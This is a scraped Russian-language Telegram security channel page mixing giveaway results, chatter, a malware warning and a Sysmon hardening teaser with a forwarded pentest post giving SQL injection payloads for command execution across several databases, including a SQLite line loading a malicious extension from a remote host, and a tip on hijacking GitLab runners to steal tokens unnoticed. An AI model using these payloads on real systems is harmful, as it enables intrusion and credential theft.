Похек
🎉 Результаты розыгрыша:
Победители:
1. Валерий (@valerius_r)
2. Azorik (@Azor1k)
3. Peka (@peka_boyarin)
4. Gshar (@Gshar4)
5. Ann (@AnnMax1703)
Проверить результаты
Победители:
1. Валерий (@valerius_r)
2. Azorik (@Azor1k)
3. Peka (@peka_boyarin)
4. Gshar (@Gshar4)
5. Ann (@AnnMax1703)
Проверить результаты
👾13🌚4⚡3
Похек
🎉 Результаты розыгрыша: Победители: 1. Валерий (@valerius_r) 2. Azorik (@Azor1k) 3. Peka (@peka_boyarin) 4. Gshar (@Gshar4) 5. Ann (@AnnMax1703) Проверить результаты
Отписал
Forwarded from hx0110
SQLi to RCE
На самом деле тема исполнения команд по средствам SQL инъекций сотни раз подвергалась обсуждениям, но думаю стоит собрать это все в одном месте). Техники брались в основном из статейки на medium и поста Intigriti в твитере (советую поглядеть)
Исполниться можно в контекстах разных баз данных:
1. MSSQL💻
2. MySQL😗
3. PostgreSQL💻
4. Oracle🤪
5. SQLite🤝 (не нашел emoji :))
MSSQL: наверно самая известная техника среди пентестеров (sqli to rce) - это способ исполнения в MSSQL базах данных с использованием хранимой процедуры
MySQL: в этой субд исполниться можно за счет определяемых пользователем функций (UDF). Правда для этого необходимо загрузить и зарегистрировать библиотеку или она должна быть загружена администратором, после чего можно вызывать функции из этой библиотеки. Например:
PostgreSQL: В постгресе есть несколько возможных подходов.
1 - Возможность подгрузки расширений. Можно использовать расширение по типу
2 - Загрузка функции напримую из libc например
3- Команда
ORACLE: так как oracle имеет встроенный Java движок это позволяет создавать разработчикам хранимые процедуры. Злоумышленники тоже могут этим воспользоваться для создания своей вредоносной процедуры(подробнее см. статью на медиуме)
SQLite: в sqlite можно также пойти через подгрузку расширений, но эта возможность должна быть явна включена:
или например с помощью
Если вдруг чего то не хватает, подмечайте, обязательно добавлю !)
#SQLi #RCE
На самом деле тема исполнения команд по средствам SQL инъекций сотни раз подвергалась обсуждениям, но думаю стоит собрать это все в одном месте). Техники брались в основном из статейки на medium и поста Intigriti в твитере (советую поглядеть)
Исполниться можно в контекстах разных баз данных:
1. MSSQL
2. MySQL
3. PostgreSQL
4. Oracle
5. SQLite
MSSQL: наверно самая известная техника среди пентестеров (sqli to rce) - это способ исполнения в MSSQL базах данных с использованием хранимой процедуры
xp_cmdshell. Конечно, должны присутствовать необходимые привилегии, чтобы ее включить, так как по дефолту она выключена. После этого можно выполнять команды:EXEC xp_cmdshell 'dir c:\';
MySQL: в этой субд исполниться можно за счет определяемых пользователем функций (UDF). Правда для этого необходимо загрузить и зарегистрировать библиотеку или она должна быть загружена администратором, после чего можно вызывать функции из этой библиотеки. Например:
SELECT sys_eval('whoami');PostgreSQL: В постгресе есть несколько возможных подходов.
1 - Возможность подгрузки расширений. Можно использовать расширение по типу
plpythonu для исполнения python когда прямо из SQL.-- create extension
CREATE EXTENSION IF NOT EXISTS plpythonu;
-- define the malicious function
CREATE OR REPLACE FUNCTION exec_cmd(cmd text) RETURNS void AS $$
import os
os.system(cmd)
$$ LANGUAGE plpythonu;
-- execute command
SELECT exec_cmd('whoami');
2 - Загрузка функции напримую из libc например
CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;
SELECT system('whoami');
3- Команда
PROGRAMORACLE: так как oracle имеет встроенный Java движок это позволяет создавать разработчикам хранимые процедуры. Злоумышленники тоже могут этим воспользоваться для создания своей вредоносной процедуры(подробнее см. статью на медиуме)
SQLite: в sqlite можно также пойти через подгрузку расширений, но эта возможность должна быть явна включена:
UNION SELECT 1,load_extension('\\example.com\mal_extension.so', 'MainFuncCall')или например с помощью
load_file() прочитать закрытые ключи SSH (этот подход можно применять и в других бдшках)Если вдруг чего то не хватает, подмечайте, обязательно добавлю !)
#SQLi #RCE
Please open Telegram to view this post
VIEW IN TELEGRAM
Medium
Exploiting SQL Injection for RCE: Five Techniques Across Popular Databases
بِسْمِ اللَّـهِ الرَّحْمَـٰنِ الرَّحِيمِ
🔥19👍2
Похек
Напоминаю, что этот конкурс закончится завтра!
👍9🔥4 1
Похек
🎉 Результаты розыгрыша:
Победители:
1. Никита (@nickmoebiusec)
2. Mikhail (@shashinma)
3. посошочек (@dbbqqp)
4. С₉H₁₈O₆
5. Maksim (@t1oximin)
Проверить результаты
Победители:
1. Никита (@nickmoebiusec)
2. Mikhail (@shashinma)
3. посошочек (@dbbqqp)
4. С₉H₁₈O₆
5. Maksim (@t1oximin)
Проверить результаты
🌚14👍1🔥1
Похек
🎉 Результаты розыгрыша: Победители: 1. Никита (@nickmoebiusec) 2. Mikhail (@shashinma) 3. посошочек (@dbbqqp) 4. С₉H₁₈O₆ 5. Maksim (@t1oximin) Проверить результаты
Отправил)
🌚12
Бывают случаи, когда вы получаете доступ к Gitlab'у в рамках пентест проекта. Но что делать кроме клона доступных репозиториев?
Если у нас есть права в рамках gitlab или репозитория, вы можете зарегистрировать gitlab runner и сделать hijack в репозиторий, куда запулят во время работы скрипта. Дальше вы получите в grabbed_data.json с токенами. Большим плюсом является то, что джоба не падает, что позволяет не привлекать не нужное внимание разработчика или тем более appsec/devsecops. Безуслоно техника не новая, но полезно о ней помнить)
⭐️ Github
💎 Cheatsheet от snovvcrash
⭐️ Ресерч от индуса
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
Если у нас есть права в рамках gitlab или репозитория, вы можете зарегистрировать gitlab runner и сделать hijack в репозиторий, куда запулят во время работы скрипта. Дальше вы получите в grabbed_data.json с токенами. Большим плюсом является то, что джоба не падает, что позволяет не привлекать не нужное внимание разработчика или тем более appsec/devsecops. Безуслоно техника не новая, но полезно о ней помнить)
Please open Telegram to view this post
VIEW IN TELEGRAM
1👍11🌚2⚡1
Расскажите про свои самые странные/кринжовые и веселые/позитивные истории связанные с собеседованиями.
Я начну: у меня есть лучший друг, который готовился на собес в один красный телеком и за пару минут до собеса, этот же телеком перестал работать во всём доме. Лицо друга представляете?)
Я начну: у меня есть лучший друг, который готовился на собес в один красный телеком и за пару минут до собеса, этот же телеком перестал работать во всём доме. Лицо друга представляете?)
😁40
Похек
BI.ZONE прислал подарки на Новый Год, как комьюнити партнеру :) Сейчас будет распакоувка
Очень по новогоднему, максимально подняли настроение сегодня. А ещё классная открытка с личными поздравлениями, что очень умилительно)
Большое спасибо команда BIZONE BugBounty <3❤️
Большое спасибо команда BIZONE BugBounty <3
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍24 14🔥9⚡1
Разбор одного вируса с ТГ канала peekbot
#malware
Автор решил написать эту заметку, чтобы помочь потенциальными жертвам подобных раздач вирусов, люди пытаются найти способы смотреть ютуб, а находят майнер в свою ОС. Здесь будут приведены все пруфы которые я смог собрать специально заражая этим вирусом отдельную машину с Windows 10.
На ТГ канале peekbot при поддержке его ютубканала peekbot, с видеоинструкциями по установке и настройке, раздаётся файл с вирусом-майнером, внедренный в известный многим пакет
➡️ Читать далее
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | ☕️ Всем новогоднего настроения!
#malware
Автор решил написать эту заметку, чтобы помочь потенциальными жертвам подобных раздач вирусов, люди пытаются найти способы смотреть ютуб, а находят майнер в свою ОС. Здесь будут приведены все пруфы которые я смог собрать специально заражая этим вирусом отдельную машину с Windows 10.
На ТГ канале peekbot при поддержке его ютубканала peekbot, с видеоинструкциями по установке и настройке, раздаётся файл с вирусом-майнером, внедренный в известный многим пакет
zapret.zip с гитхаба, который меняет формат пакетов tcp/ip чтобы "ускорить" старые "медленные сервера" googlevideo и не только. Заранее просьба ко всем - подайте жалобы на эти TG и Youtube каналы с указанием на вирус-майнер. Жертв вируса будет намного меньше если эти каналы исчезнут, там сейчас очень много незадачливых подписчиков (30к на ТГ и 61К а Ютубе).Please open Telegram to view this post
VIEW IN TELEGRAM
🔥14👍6 6
Новогодний опрос про ваш опыт прохождения курсов в этом году 🌚
Опрос анонимный, данные никуда не уйдут😹
👉 Отвечать ТУТ 👈
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | ☕️ Всем новогоднего настроения!
Опрос анонимный, данные никуда не уйдут
Please open Telegram to view this post
VIEW IN TELEGRAM
Попытались меня сейчас развести якобы от лица моего телефонного оператора
Назвали мои данные: ФИО, номер телефона, СНИЛС, ИНН. Якобы закончился срок действия номера телефона и предложили или продлить, или заменить на другой. Я чёт как лопух во всё поверил, т.к. очень грамотно ссылались на законодательные акты о перс данных, случаях серых симок и т.д.
Последнее, что остановило: СМС от госуслуг, гдесука написано: Смена пароля и код для подтверждения, который нужно было назвать боту. Вот тут я уже трубку сбросил.
Будьте бдительны и не видетесь на новую разводку❤️
Назвали мои данные: ФИО, номер телефона, СНИЛС, ИНН. Якобы закончился срок действия номера телефона и предложили или продлить, или заменить на другой. Я чёт как лопух во всё поверил, т.к. очень грамотно ссылались на законодательные акты о перс данных, случаях серых симок и т.д.
Последнее, что остановило: СМС от госуслуг, где
Будьте бдительны и не видетесь на новую разводку
Please open Telegram to view this post
VIEW IN TELEGRAM
👍36😁36⚡5
Надзор за Sysmon. Защищаем мониторинг от атак штатными средствами Windows
#харденинг #windows #sysmon
На пути атакующего часто стоят системы EDR, цель которых — обнаружить атаку и сообщить о ней первой линии обороны SOC. Чтобы оставаться незамеченными, пентестерам приходится обходить мониторинг. В этой статье поговорим о том, как именно это делается в случае с атаками на Windows.
Как известно, один из основных механизмов Windows, на который полагаются большинство решений класса EDR, — это Event Tracing for Windows. Он как поставляет данные для формирования алертов, так и делает записи в привычном нам журнале событий (в отдельных случаях).
Ранее мы уже разбирали, как атакующие могут воздействовать на подсистему ETW, чтобы сделать Sysmon максимально бесполезным. В этом материале мы посмотрим, как эти техники можно детектировать (как ни странно, но с помощью того же самого ETW).
🔓 Читать далее
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
#харденинг #windows #sysmon
На пути атакующего часто стоят системы EDR, цель которых — обнаружить атаку и сообщить о ней первой линии обороны SOC. Чтобы оставаться незамеченными, пентестерам приходится обходить мониторинг. В этой статье поговорим о том, как именно это делается в случае с атаками на Windows.
Как известно, один из основных механизмов Windows, на который полагаются большинство решений класса EDR, — это Event Tracing for Windows. Он как поставляет данные для формирования алертов, так и делает записи в привычном нам журнале событий (в отдельных случаях).
Ранее мы уже разбирали, как атакующие могут воздействовать на подсистему ETW, чтобы сделать Sysmon максимально бесполезным. В этом материале мы посмотрим, как эти техники можно детектировать (как ни странно, но с помощью того же самого ETW).
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2024-30085 PoC